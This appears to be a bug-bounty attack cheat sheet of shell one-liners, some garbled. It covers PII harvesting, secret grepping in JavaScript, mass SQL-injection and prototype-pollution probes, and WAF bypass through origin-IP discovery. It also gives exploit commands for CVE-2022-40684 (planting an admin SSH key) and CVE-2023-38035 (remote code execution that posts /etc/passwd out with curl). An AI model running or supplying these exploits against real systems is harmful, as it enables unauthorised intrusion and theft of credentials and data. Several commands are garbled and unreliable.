Copy # Grep emails and other PII Data from URLs file
grep -E -o '\\\\\\\\b[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\\\\\.[a-zA-Z]{2,}\\\\\\\\b' urls.txt
#Extract Endpoints from JavaScript
cat FILE.js | grep -oh "\\\\\\\\"\\\\\\\\/[a-zA-Z0-9_/?=&]&\\\\\\\\""| sed -e 's/^"//' -e 's/"$//' | sort -u
#Get CIDR & Org Information from Target Lists
for HOST in $(cat HOSTS.txt); do echo (for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\\\\\\\\|Organization" | tr -s " | paste -; done | uniq); done
#Prototype Pollution
subfinder -d HOST -all -silent ❘ httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\\\\\\\\/?_proto_[testparam]=exploit\\\\\\\\//' FILE.txt | page- fetch -j 'window.testparam == "exploit"? "[VULNERABLE]": "[NOT VULNERABLE]" | sed "s/(//g" sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"
# Sitemap SQL Injection
cat urls.txt | httpx -silent -path 'sitemap.xml?offset=1%3bSELECT%20IF((8303%3E8302)%2cSLEEP(10)%2c2356)%23' -rt -timeout 20 -mrt '>10'
# Authentication Bypass (CVE-2022-40684) POC --> <>
ffuf -w "host_list.txt:URL" -u "<https://URL/api/v2/cmdb/system/admin/admin>" -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[]:8000";by=”[]:9000";' -d '{"ssh-public-key1": "h4x0r"}' -mr "SSH" -r
## CVE-2023-26256 -> <>
git clone <>
python3 -h
# CVE-2023-38035 - Unauth. RCE
python3 -c "from pyhessian.client import HessianProxy as H; H('https://TARGET-DOMAIN:8443/mics/services/MICSLogService').uploadFileUsingFileInput({'command': 'curl -X POST -d @/etc/passwd [](', 'isRoot': True}, None)"
# Quick Port Scanning with Fuzzing
cat ips.txt|naabu -silent -tp 1000 -o top1k.txt;cat top1k.txt|grep -vE ':80|:443' | httpx -silent -fc 400,503,204,405 -o httpx.txt;cat httpx.txt|python3 []( --stdin -e '*' -t 60 -w onelistforall.txt -i 200,301,302 --format plain -o report.txt
# SSRF use Autorize Exxtension Match and replace
Copy # Collect JS Files
katana -list targets.txt -jc | grep “\\.js$” | uniq | sort -u | tee JS.txt
# or use gau tool
cat targets.txt | gau | grep “\\.js$” | uniq | sort -u | tee JS2.txt
# Analyzing JS files
nuclei -l JS.txt -t ~/nuclei-templates/exposures/ -o js_exposures_results.txt
nuclei -l JS2.txt -t ~/nuclei-templates/exposures/ -o js_exposures_results.txt
cat Js_urls.txt | Mantra
# Download all JS files
while IFS= read -r link
wget "$link"
done < "$file"
while IFS= read -r link
wget "$link"
done < "$file"
# Use This Regex to search for sensitive info
grep -r -E "aws_access_key|aws_secret_key|api key|passwd|pwd|heroku|slack|firebase|swagger|aws_secret_key|aws key|password|ftp password|jdbc|db|sql|secret jet|config|admin|pwd|json|gcp|htaccess|.env|ssh key|.git|access key|secret token|oauth_token|oauth_token_secret|smtp|GTM-" *.js
Bypass WAF and Find Origin IPs
Copy prips | hakoriginfinder -h
If you receive a "MATCH" output, there's a strong likelihood that you've successfully identified the Origin IP. Now, you can send requests with the same Host header to bypass WAF
Copy Use Some Hash's And Encoding Algorithm's (MD5 , SHA-1 , SHA-256 , base32 , base64 , etc . . . )
From Most Common WordList Content Discovery With Common Extensions , Say :
https://example*com/Fuzz/<HashValue>.asp , . . .
Use Random Bytes With base64 To Fuzz Sensitive Fails , With Extension Or Not , Say:
- Generate Wordlist Examples
cat common.txt | while read word; do echo -n "$word" | base64 | tee -a base64-wordlist.txt ; done
cat wordlist.txt | while read word; do echo -n "$word" | md5sum | cut -d ' ' -f1 | tee -a MD5-Hashs.txt; done
uploads => 5128f35c9b4be13788ba41bdb6d1fc1f
cmd => dfff0a7fa1a55c8c1a4966c19f6da452
index => aW5keAo=
. . .
. . .
- Say In Ffuf
ffuf -w MD5-Hashs.txt:/W1 -w extensions.txt:/W2 -u "https://example*com/path/W1.W2" -mc 200
ffuf -w base64-wordlist.txt:/W1 -w extensions.txt:/W2 -u "https://example*com/path/W1.W2" -mc 200
U Can After get 200 Status Code From Fails With Extension , Discover Parameters Using (arjun, ParamSpider , etc . . . ) Tools
etc . . .